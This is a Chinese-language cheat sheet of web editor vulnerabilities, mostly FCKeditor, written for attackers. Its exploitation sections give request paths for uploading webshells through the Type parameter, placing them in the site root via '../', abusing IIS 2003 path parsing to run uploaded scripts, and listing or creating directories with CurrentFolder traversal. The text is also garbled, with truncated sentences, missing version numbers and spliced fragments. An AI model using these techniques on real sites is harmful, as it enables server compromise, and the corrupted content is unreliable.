网页编辑器漏洞大全.doc

网页编辑器漏洞大全
网页编辑器漏洞大全
涵盖了诸如常见的FCKeditor、eWebEditor、Cuteditor、Freetextbox、Webhtmleditor、Kindeditor、所谓的eWeApache文件名解析缺陷漏洞"也可以利用之，详见"附录A"
另建议其他上传漏洞中定义TYPE变量时使用File类别来上传文件,根据FCKeditor的代码，其限制最为狭隘。
攻击利用:
允许其他任何后缀上传
利用2003路径解析漏洞上传网马
影响版本: 附录B
脆弱描述：
利用2003系统路径解析漏洞的原理，创建类似“”如此一般的目录，再在此目录中上传文件即可被脚本解释器以相应脚本权限执行。
攻击利用:
fckeditor/editor/filemanager/browser/default/?Type=Image&Connector=connectors/asp/

FCKeditor PHP上传任意文件漏洞
影响版本: FCKeditor <= FCKeditor
脆弱描述：
FCKeditor在处理文件上传时存在输入验证错误，远程攻击可以利用此漏洞上传任意文件。
在通过editor/filemanager/upload/php/。
，而默认是禁用的。
攻击利用: (请修改action字段为指定网址)：
，则修改Type=任意值 即可，但注意，如果换回使用Media则必须大写首字母M,否则LINUX下，FCKeditor会对文件目录进行文件名校验，不会上传成功的。
TYPE自定义变量任意上传文件漏洞
影响版本: 较早版本
脆弱描述：
通过自定义Type变量的参数，可以创建或上传文件到指定的目录中去，且没有上传文件格式的限制。
攻击利用: /FCKeditor/editor/filemanager/browser/default/?Type=all&Connector=connectors/asp/
打开这个地址就可以上传任何类型的文件了，Shell上传到的默认位置是:找不见就去本文前面找，有教如何看默认上传目录的方法

"Type=all" 这个变量是自定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
比如输入:
/FCKeditor/editor/filemanager/browser/default/?Type=../&Connector=connectors/asp/
网马就可以传到网站的根目录下.
FCKeditor 新闻组件遍历目录漏洞
影响版本:aspx版FCKeditor，其余版本未测试
脆弱描述：如何获得***请参考上文“TYPE自定义变量任意上传文件漏洞”
攻击利用:
修改CurrentFolder参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=
根据返回的XML信息可以查看网站所有的目录。
/browser/default/connectors/aspx/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
FCKeditor中***的其他上传方式
影响版本:非优化/精简版本的FCKeditor
脆弱描述：
如果存在以下文件，打开后即可上传文件。
攻击利用:
fckeditor/editor/filemanager/upload/
fckeditor/editor/filemanager/browser/default/connectors/
FCKeditor 文件上传“.”变“_”下划线